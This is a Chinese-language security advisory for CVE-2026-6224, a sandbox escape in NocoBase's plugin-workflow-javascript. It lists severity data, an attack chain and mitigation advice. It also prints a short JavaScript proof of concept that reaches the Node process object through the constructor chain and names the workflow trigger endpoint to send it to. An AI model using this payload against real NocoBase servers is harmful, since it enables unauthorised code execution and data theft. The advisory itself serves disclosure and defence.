CVE-2026-6224 CVSS 7.3 高危

CVE-2026-6224 NocoBase沙箱逃逸漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6224

漏洞类型

沙箱逃逸

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NocoBase plugin-workflow-javascript

漏洞概述

NocoBase的plugin-workflow-javascript插件（版本2.0.23及以下）存在安全漏洞。问题出在`Vm.js`文件的`createSafeConsole`函数中，由于沙箱机制存在缺陷，攻击者可远程发起攻击并绕过沙箱限制。目前利用代码已公开，厂商尚未回应，建议尽快关注修复动态。

技术细节

该漏洞核心在于NocoBase工作流JavaScript插件执行环境的不安全性。`Vm.js`中的`createSafeConsole`试图提供一个受限的控制台对象，但未能完全隔离执行上下文。攻击者可以通过精心构造的恶意JavaScript代码，利用JavaScript原型链或特定对象属性访问机制，绕过沙箱限制。由于漏洞无需认证且可远程触发，攻击者向受影响端点发送特制请求后，即可在服务端上下文中执行任意操作，可能导致敏感信息泄露或数据篡改。

攻击链分析

STEP 1

侦察

识别使用NocoBase并启用了受影响插件的目标系统。

STEP 2

漏洞利用

构造针对createSafeConsole的恶意JavaScript代码，利用沙箱缺陷。

STEP 3

远程攻击

无需认证，通过网络向目标API发送包含恶意代码的请求。

STEP 4

沙箱逃逸

代码在服务端执行，绕过沙箱限制，获取服务器敏感信息或执行操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Conceptual Proof of Concept for CVE-2026-6224
// Target: NocoBase plugin-workflow-javascript

// Malicious payload designed to escape the sandbox via createSafeConsole
const payload = `
  try {
    // Attempt to access the Function constructor to break out of the sandbox
    const func = this.constructor.constructor;
    const process = func('return process')();
    console.log('Sandbox Escape Successful');
    console.log('User:', process.env.USER);
  } catch (e) {
    console.log('Exploit failed:', e.message);
  }
`;

// Usage: Send this payload to the workflow execution endpoint
// POST /api/workflows:<id>/trigger

影响范围

NocoBase plugin-workflow-javascript <= 2.0.23

防御指南

临时缓解措施

建议立即排查NocoBase系统版本，若受影响应暂时停止使用workflow-javascript插件功能。同时，加强访问控制策略，仅允许受信任的内部网络访问管理后台，防止外部攻击者利用该漏洞进行探测和攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表